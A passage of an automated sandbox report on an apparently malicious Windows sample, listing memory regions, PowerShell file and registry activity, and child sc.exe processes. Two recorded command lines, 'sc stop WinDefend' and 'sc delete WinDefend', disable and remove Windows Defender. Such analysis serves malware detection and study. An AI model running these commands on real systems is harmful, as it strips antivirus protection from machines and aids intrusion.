pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x001f0000 0x001f3fff Memory Mapped File Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00200000 0x0021efff Memory Mapped File Readable True False False -
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x00230000 0x0025ffff Memory Mapped File Readable True False False -
cversions.2.db 0x00260000 0x00263fff Memory Mapped File Readable True False False -
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x002effff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x002fffff Private Memory - True False False -
private_0x0000000000300000 0x00300000 0x0030ffff Private Memory - True False False -
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False -
private_0x0000000000350000 0x00350000 0x003cffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x003d0000 0x00435fff Memory Mapped File Readable True False False -
private_0x0000000000440000 0x00440000 0x0044ffff Private Memory - True False False -
private_0x0000000000450000 0x00450000 0x0045ffff Private Memory - True False False -
private_0x0000000000460000 0x00460000 0x0046ffff Private Memory - True False False -
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory - True False False -
private_0x0000000000480000 0x00480000 0x004bffff Private Memory Readable, Writable, Executable True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True False False -
l_intl.nls 0x004d0000 0x004d2fff Memory Mapped File Readable False False False -
private_0x00000000004e0000 0x004e0000 0x004e0fff Private Memory Readable, Writable True False False -
sorttbls.nlp 0x004f0000 0x004f4fff Memory Mapped File Readable False False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True False False -
microsoft.wsman.runtime.dll 0x00540000 0x00547fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000650000 0x00650000 0x007d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007e0000 0x007e0000 0x00960fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000970000 0x00970000 0x01d6ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d70000 0x01d70000 0x01e4efff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e50000 0x01e50000 0x01e50fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e80000 0x01e80000 0x01ebffff Private Memory Readable, Writable True False False -
private_0x0000000001ed0000 0x01ed0000 0x01f0ffff Private Memory Readable, Writable True False False -
private_0x0000000001f10000 0x01f10000 0x01f4ffff Private Memory Readable, Writable True False False -
private_0x0000000001f50000 0x01f50000 0x01f5ffff Private Memory Readable, Writable True False False -
private_0x0000000001f60000 0x01f60000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000002070000 0x02070000 0x020affff Private Memory Readable, Writable True False False -
sortkey.nlp 0x020b0000 0x020f0fff Memory Mapped File Readable False False False -
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False -
private_0x0000000002150000 0x02150000 0x0218ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02190000 0x0245efff Memory Mapped File Readable False False False -
pagefile_0x0000000002460000 0x02460000 0x02852fff Pagefile Backed Memory Readable True False False -
private_0x0000000002890000 0x02890000 0x028cffff Private Memory Readable, Writable True False False -
system.transactions.dll 0x028d0000 0x0290ffff Memory Mapped File Readable False False False -
private_0x0000000002910000 0x02910000 0x0294ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002950000 0x02950000 0x029effff Private Memory Readable, Writable True False False -
private_0x0000000002a70000 0x02a70000 0x02a7ffff Private Memory Readable, Writable True False False -
private_0x0000000002a80000 0x02a80000 0x04a7ffff Private Memory Readable, Writable True False False -
private_0x0000000004aa0000 0x04aa0000 0x04adffff Private Memory Readable, Writable True False False -
system.management.automation.dll 0x04ae0000 0x04dc1fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll.mui 0x04dd0000 0x04e8ffff Memory Mapped File Readable, Writable False False False -
powershell.exe 0x21d50000 0x21dc1fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
system.management.automation.ni.dll 0x71f20000 0x72799fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.dll 0x727a0000 0x72a81fff Memory Mapped File Readable, Writable, Executable False False False -
system.ni.dll 0x72a90000 0x7322bfff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x73230000 0x73d27fff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x73d30000 0x742dafff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
system.core.ni.dll 0x74400000 0x74634fff Memory Mapped File Readable, Writable, Executable True False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
system.transactions.ni.dll 0x74680000 0x7471bfff Memory Mapped File Readable, Writable, Executable True False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.commands.diagnostics.ni.dll 0x747a0000 0x747eafff Memory Mapped File Readable, Writable, Executable True False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.consolehost.ni.dll 0x749a0000 0x74a20fff Memory Mapped File Readable, Writable, Executable True False False -
msvcr80.dll 0x74a80000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x74b20000 0x74b99fff Memory Mapped File Readable, Writable, Executable True False False -
ntshrui.dll 0x74ba0000 0x74c0ffff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.wsman.management.ni.dll 0x75020000 0x750a4fff Memory Mapped File Readable, Writable, Executable True False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x75340000 0x7534afff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x75360000 0x75369fff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x75370000 0x75388fff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x75390000 0x75398fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x753a0000 0x753ebfff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x75430000 0x7545dfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x75460000 0x75554fff Memory Mapped File Readable, Writable, Executable False False False -
mscoree.dll 0x75560000 0x755a9fff Memory Mapped File Readable, Writable, Executable True False False -
atl.dll 0x755b0000 0x755c3fff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.wsman.runtime.dll 0x755e0000 0x755e7fff Memory Mapped File Readable, Writable, Executable False False False -
system.configuration.install.ni.dll 0x755f0000 0x75614fff Memory Mapped File Readable, Writable, Executable True False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 50 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (114)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 6
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Users\kFT6uTQW type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 4
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Write CONOUT$ size = 79 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 79 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 62 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 17 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 57 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 79 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 25 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 54 True 1
Fn
Data
Write CONOUT$ size = 1 True 1
Fn
Data
Write CONOUT$ size = 1 True 2
Fn
Data
Registry (14)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Module (1)
Operation Module Additional Information Success Count
Get Filename - process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
User (1)
Operation Additional Information Success Count
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
System (5)
Operation Additional Information Success Count
Get Info type = Operating System True 4
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Environment (55)
Operation Additional Information Success Count
Get Environment String name = MshEnableTrace False 49
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Get Environment String name = HOMEPATH, result_out = \Users\kFT6uTQW True 1
Get Environment String name = HomeDrive, result_out = C: True 1
Get Environment String name = HomePath, result_out = \Users\kFT6uTQW True 1
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Process #19: sc.exe
8 0
Information Value
ID #19
File Name c:\windows\syswow64\sc.exe
Command Line sc delete WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
Information Value
PID 0x9a4
Parent PID 0x77c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x9D4
0x75C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
sc.exe.mui 0x00080000 0x0008ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x001fffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x00200000 0x002bffff Memory Mapped File Readable, Writable False False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x0044ffff Private Memory Readable, Writable True False False -
private_0x0000000000620000 0x00620000 0x0071ffff Private Memory Readable, Writable True False False -
sc.exe 0x00840000 0x0084bfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (3)
Operation Filename Additional Information Success Count
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Open STD_OUTPUT_HANDLE - True 1
Write STD_OUTPUT_HANDLE size = 51 True 1
Module (1)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\sc.exe base_address = 0x840000 True 1
Service (2)
Operation Additional Information Success Count
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
System (2)
Operation Additional Information Success Count
Get Time type = System Time, time = 2018-06-25 14:54:41 (UTC) True 1
Get Time type = Ticks, time = 269429 True 1
Process #20: sc.exe
8 0
Information Value
ID #20
File Name c:\windows\syswow64\sc.exe
Command Line sc stop WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
Information Value
PID 0x9d8
Parent PID 0x13c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xA14
0xA50
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
sc.exe.mui 0x000f0000 0x000fffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x002c0000 0x0037ffff Memory Mapped File Readable, Writable False False False -
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x0046ffff Private Memory Readable, Writable True False False -
private_0x00000000005a0000 0x005a0000 0x0069ffff Private Memory Readable, Writable True False False -
sc.exe 0x00840000 0x0084bfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (3)
Operation Filename Additional Information Success Count
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Open STD_OUTPUT_HANDLE - True 1
